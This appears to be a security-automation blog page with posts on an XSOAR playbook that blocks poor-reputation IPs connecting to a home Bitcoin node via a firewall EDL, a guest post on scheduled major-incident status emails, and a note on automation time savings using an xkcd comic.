I have to open up my firewall to the entire world. Because I have a Palo Alto NGFW at home, I can restrict that traffic to ‘Bitcoin’ specifically and only on the default Bitcoin port, but I’m still completely open to any potentially malicious actor. Checking the reputation of IP addresses manually and then blocking those of poor repute is possible, but there are several Bitcoin connections per minute, and checking each and every IP would be neither enjoyable nor possible without giving up my day job and becoming a reclusive hermit living in the Jundland Wastes.

This is where XSOAR came in. Thanks to its many integration points, I was able to instruct XSOAR to check the reputation of incoming connections in Palo Alto’s threat intel service, AutoFocus, and, if an IP’s reputation is poor, to block further connections from it by adding the IP address to an externally hosted text file (an EDL) that Panorama is configured to pull every hour. The reason an EDL is used, rather than pushing IPs to policies, is simple: no change commit is required from Panorama, making the whole process simpler and more dynamic.

The playbook is as follows:

  • Dedupe Incidents – I noticed many connections are from the same IP address. This sub playbook recognises that fact and closes the case if the source IP has been seen within the last hour.
  • Check for source IP – Allows for a graceful end to the playbook if an IP address is not present in the log that generates the incident.
  • Send the IP address to AutoFocus.
  • If Reputation is good, close the incident.
  • If the reputation is bad, enrich with IPInfo for investigation, add the IP address to an EDL that Panorama is constantly pulling data from, and email me to make me aware that this has happened.
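Here is the same flow as a compact sketch, outside XSOAR. `reputation_lookup` is a hypothetical callable standing in for the AutoFocus integration, the dedupe cache is an in-memory dict (in the real build, as described below, pre-processing took over that burden), and the email step is left out. The EDL itself is just a text file with one IP per line, which `render_edl` produces.

```python
import ipaddress


class BitcoinConnectionTriage:
    """Sketch of the dedupe -> source IP check -> reputation -> EDL flow.

    reputation_lookup is a hypothetical callable (ip -> "good" | "bad") standing in
    for the AutoFocus integration; email notification is left out.
    """

    def __init__(self, reputation_lookup, dedupe_seconds: int = 3600):
        self.lookup = reputation_lookup
        self.dedupe_seconds = dedupe_seconds
        self.last_checked = {}  # ip -> time of its last full check
        self.blocked = []       # IPs published on the EDL, in the order added

    def handle(self, source_ip, now: float) -> str:
        if not source_ip:
            return "closed: no source IP"
        try:
            ipaddress.ip_address(source_ip)
        except ValueError:
            return "closed: no source IP"
        last = self.last_checked.get(source_ip)
        if last is not None and now - last < self.dedupe_seconds:
            return "closed: duplicate"
        self.last_checked[source_ip] = now
        if self.lookup(source_ip) != "bad":
            return "closed: good reputation"
        if source_ip not in self.blocked:
            self.blocked.append(source_ip)
        return "open: added to EDL"

    def render_edl(self) -> str:
        """EDL body: one IP per line, served as the text file the firewall pulls."""
        return "".join(ip + "\n" for ip in self.blocked)
```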

But there was a problem. My XSOAR server sounded like it was about to take off after a few minutes of operation. What was happening? I hadn’t taken into account the sheer number of inbound connections and the processing required just to run the dedupe playbook. I was looking at hundreds of incidents being opened per hour.

This is where pre-processing saved the day! Rather than have XSOAR spin up Docker images every time a dedupe automation was needed, I added a pre-processing rule to take on some of that burden.

This is how my dashboard looked after 12 hours:

For the IPs that fail reputation checks, the cases stay open and I receive an email notification containing the IP address and AutoFocus’s verdict.

The cases are open for easy access and to allow me to investigate further if I wish, but there is nothing required from me, as the IP addresses have already been added to the text file that my Firewall is reading from for IP addresses to block.

No business in its right mind would run a Bitcoin node in its data centre, but this playbook could be used for any service that has to be open to the outside world. Mail and web servers must accept connections on ports 25/80/443. They may be in your DMZ, but do you know who’s attempting to connect to them? Do you check IP reputation before allowing connections to them? Using the IP enrichment info, you could also block IP ranges based on geographical location to drastically reduce your attack surface if you wish.

But it doesn’t end there. Because of XSOAR’s many integration points, these IP addresses can be shared with other technologies. Have a custom policy within Mimecast or Proofpoint for blocked IPs? XSOAR can hook into and add to those policies for you. Using cloud security technologies? XSOAR can also have them add the IPs to their block lists. XSOAR is like an octopus amid all these disparate technologies, holding them together and orchestrating collaboration.

Ben


Amazing article, thanks Ben for the concept, your work building it, and time typing it up for everyone to read!

Andy

Major Incident Management use case [Guest Post]

Editor’s note: A massive thank you to Patrick Bayle for today’s guest post on using a SOAR playbook to handle major incident management comms.


When is a use case classified as something other than a use case?

When I pose the question to customers I engage with, the responses typically come from a small subset of common challenges focused on security incident management. Some typical examples:

  • triaging SIEM alerts
  • malware investigations
  • Phishing

And so on. It’s hard sometimes not to feel like I am a terrible game show host seeking audience participation but I would much rather this than hear crickets!

I am nothing if not prepared for such engagements, and first-hand experience helps when focusing attention on the matters that would bring the MOST value to the SOC. One such example is common, but rarely thought of in the realm of incident handling.

In an industry plagued with three-letter acronyms, this one appears to have slipped through the net, for now at least. I have heard it described as “Major Incident Management” (MIM) or “Critical Incident Handling” (CIH). Neither the acronym nor the naming convention matters in truth, yet this is one challenge that can have serious repercussions for a business if it is not automated. Pertaining specifically to MIM/CIH, the SOC’s goal is to:

Ensure a consistent methodology is applied during a major/ critical incident and regular communications occur during the investigation of said incident. 

If you’ve ever had to firefight (metaphorically or otherwise), then you will know that communication is often automatically pushed to the bottom of the list, as the priority is to fight the fire (obviously). A SOC analyst has to diagnose and mitigate a threat as quickly as possible, and naturally all attention is on performing this duty. Updating management slows the response and detracts from the task at hand, so quite simply automation is the only option.

How about this: a playbook that runs on a schedule and sends an email in a predefined format to a distribution list whenever an open incident matches “critical”. That would solve the problem of communication whilst ensuring that the SOC can do their thing and put the fire out as quickly as possible! Well, look no further, as we have a playbook for that:

The playbook logic is very simple: If there is no critical incident, then no email is sent; if there is a critical incident then the playbook generates the report at a schedule defined by the business (in my case the requirement was to update management at least every thirty minutes but this does vary). Here’s the filter on the search incident task:

And the mail received, with an attachment and a small amount of text with the incident numbers (customisable of course):


The attachment (funnily enough, also easily customised) is designed for management’s perusal. A separate email with much more detail can also be sent to the SOC manager… but this is probably unnecessary as they should be using the default XSOAR dashboard that shows them this 🙂
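The core decision each scheduled run makes can be sketched outside the platform. This assumes incidents come back from the search as simple records with a severity and status; the subject and body format are illustrative, not the actual template, and sending the email is left to the platform’s mail integration.

```python
from dataclasses import dataclass
from datetime import datetime


@dataclass
class Incident:
    id: int
    name: str
    severity: str
    status: str


def build_mim_update(incidents: list, now: datetime):
    """Return (subject, body) for the scheduled management update, or None if nothing is critical."""
    critical = [i for i in incidents if i.severity == "critical" and i.status != "closed"]
    if not critical:
        return None  # no open critical incident: this run sends nothing
    subject = f"[MIM] {len(critical)} critical incident(s) open - update {now:%Y-%m-%d %H:%M}"
    lines = [f"#{i.id} {i.name} ({i.status})" for i in critical]
    body = "Open critical incidents:\n" + "\n".join(lines)
    return subject, body
```

Run every thirty minutes, this gives exactly the behaviour described: silence when nothing is critical, and a regular update otherwise.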

I have no doubt that every SOC has this need but maybe they just don’t know it yet?

My closing advice: always think broader than the two or three incidents you work on regularly, or the most annoying cases you work on within the SOC. The business should know the value the SOC brings by thwarting attacks in a timely manner, and you should be able to easily demonstrate that value to the organisation.


Awesome post Patrick, I look forward to your next one 🙂

Andy

XKCD on SOAR metrics

Is It Worth the Time?

https://xkcd.com/1205/

That is to say that… a saving of 5 minutes, on an action that happens 5 times a day… you’re allowed to spend 4 weeks making it and still be in the green over 5 years (the time horizon the comic uses).

I’ve never spent 4 weeks purely on a use case, that’s insane. Many playbooks I build take about 1 day (that includes building, testing, case management, reporting, SLA metrics, etc.), with some more complicated playbooks taking a few days.

I don’t recall ever needing 5-6 days, but even if I had…. that time is justified on a use case that:

  • is once a week 30 min saving (Green)
  • is daily 5 minute saving (Blue)
  • is frequent 1 minute saving (Red)
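The comic’s arithmetic is easy to reproduce: time saved per run × runs per day × 5 years, expressed in 24-hour days as the comic does. "Frequent" is my assumption of 5 times a day, so read the last row with that in mind.

```python
FIVE_YEARS_IN_DAYS = 5 * 365
MINUTES_PER_DAY = 24 * 60


def break_even_minutes(minutes_saved: float, runs_per_day: float) -> float:
    """Total time saved over five years: the most you can spend automating and still break even."""
    return minutes_saved * runs_per_day * FIVE_YEARS_IN_DAYS


def to_days(minutes: float) -> float:
    return minutes / MINUTES_PER_DAY  # 24-hour days, as in the comic


examples = {
    "5 min, 5 times a day": break_even_minutes(5, 5),      # ~31.7 days, about 4.5 weeks
    "30 min, once a week": break_even_minutes(30, 1 / 7),  # ~5.4 days
    "5 min, daily": break_even_minutes(5, 1),              # ~6.3 days
    "1 min, 5 times a day": break_even_minutes(1, 5),      # ~6.3 days
}
for label, minutes in examples.items():
    print(f"{label}: {to_days(minutes):.1f} days")
```

All three highlighted cases land at 5-6 days, which is why even a multi-day playbook build pays for itself.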

Andy

(Randall you’re awesome, keep writing those books!)